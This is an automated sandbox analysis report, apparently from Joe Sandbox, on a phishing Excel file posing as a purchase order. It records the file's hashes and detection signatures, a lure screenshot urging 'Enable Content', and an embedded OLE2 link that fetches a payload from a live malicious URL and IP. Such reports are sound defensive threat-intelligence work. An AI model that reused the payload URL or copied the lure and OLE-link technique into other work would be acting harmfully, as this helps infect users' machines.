Windows Analysis Report
PO 4500025813.xls

Overview

General Information

Sample name: PO 4500025813.xls
Analysis ID: 1446720
MD5: 1a1256f2cb9b79e436d93cb4ef7965e9
SHA1: d759cc8c94f83d931d339bf576c2d2a6d2edc111
SHA256: 547e6df90153f3d2b2c8ae05399fef0b98431f2ec3d5628cb570acf0f0af393e
Tags: xls

Detection

Score: 60
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Excel sheet contains many unusual embedded objects
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

AV Detection

Source: PO 4500025813.xls ReversingLabs: Detection: 15%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: global traffic DNS query: name: qr-in.com
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:80
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:80
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:80
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:80
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:80
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80
Source: Joe Sandbox View IP Address: 188.114.97.3
Source: global traffic HTTP traffic detected:
  GET /RtWEZGi HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: qr-in.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  GET /RtWEZGi HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: qr-in.com
  Connection: Keep-Alive
  Cookie: PHPSESSID=2fpj5qe86di95ocg0rn295j24v
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FBE9C81C.emf
Source: global traffic DNS traffic detected: DNS query: qr-in.com
Source: PO 4500025813.xls, 5D330000.0.dr String found in binary or memory: http://qr-in.com/RtWEZGi
Source: PO 4500025813.xls, 5D330000.0.dr, A04C86FF.emf.0.dr, 7B56516D.png.0.dr, ~DF8B0F277084679A1A.TMP.0.dr, ~DF6E18AAE11A49FA57.TMP.0.dr String found in binary or memory: http://www.day.com/dam/1.0

System Summary

Source: Screenshot number: 12 Screenshot OCR: Enable Content from the yellow bar above 19 12 ' " Vol :1ren KOyU, Canakk 20 13 " Akc ay Cad. No
Source: PO 4500025813.xls OLE: Microsoft Excel 2007+
Source: ~DF8B0F277084679A1A.TMP.0.dr OLE: Microsoft Excel 2007+
Source: 5D330000.0.dr OLE: Microsoft Excel 2007+
Source: PO 4500025813.xls Stream path 'MBD00088CAD/\x1Ole' : http://qr-in.com/RtWEZGi**>OFl=Iz%BLN3\}_Cxoja1[{d+D/hBrhSw;(a/6l:k")Yn{8OspjCi*,XNd&Q6S-=`.+-:b/bvHxVr:ftn3Wz>vsT|M"OECcY3ad2UKC34mOfXGjIQl5QXdRsCwN4zSPsZsqL48KjLOlkfCVLXwtId00gxEI7RyYeyRGopk96g6U45ALPHzFLbtg6F3wyMkWjn5Ld1WyCViIwQZOf3mbQrozuqVevIfNkQkXyJ2XX1mEjmycs2qY7La5PRfxMwrng5oaDgCJ7JbIpj5TMcguLG8mQdAZjYt561eNcgAVXQKpj8AGtqQWwEraEtaERrWM5JHrS3StvKs|K|\j]"Jik$.uw
Source: 5D330000.0.dr Stream path 'MBD00088CAD/\x1Ole' : http://qr-in.com/RtWEZGi**>OFl=Iz%BLN3\}_Cxoja1[{d+D/hBrhSw;(a/6l:k")Yn{8OspjCi*,XNd&Q6S-=`.+-:b/bvHxVr:ftn3Wz>vsT|M"OECcY3ad2UKC34mOfXGjIQl5QXdRsCwN4zSPsZsqL48KjLOlkfCVLXwtId00gxEI7RyYeyRGopk96g6U45ALPHzFLbtg6F3wyMkWjn5Ld1WyCViIwQZOf3mbQrozuqVevIfNkQkXyJ2XX1mEjmycs2qY7La5PRfxMwrng5oaDgCJ7JbIpj5TMcguLG8mQdAZjYt561eNcgAVXQKpj8AGtqQWwEraEtaERrWM5JHrS3StvKs|K|\j]"Jik$.uw
Source: ~DF8B0F277084679A1A.TMP.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: classification engine Classification label: mal60.winXLS@1/10@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\5D330000
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR7FB9.tmp
Source: PO 4500025813.xls OLE indicator, Workbook stream: true
Source: 5D330000.0.dr OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: PO 4500025813.xls Initial sample: OLE indicators vbamacros = False
Source: PO 4500025813.xls Initial sample: OLE indicators encrypted = True
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: PO 4500025813.xls Stream path 'MBD00088CAC/Package' entropy: 7.95103243582 (max. 8.0)
Source: PO 4500025813.xls Stream path 'Workbook' entropy: 7.98985924559 (max. 8.0)
Source: ~DF8B0F277084679A1A.TMP.0.dr Stream path 'Package' entropy: 7.94201653752 (max. 8.0)
Source: 5D330000.0.dr Stream path 'MBD00088CAC/Package' entropy: 7.94201653752 (max. 8.0)
Source: 5D330000.0.dr Stream path 'Workbook' entropy: 7.99709423089 (max. 8.0)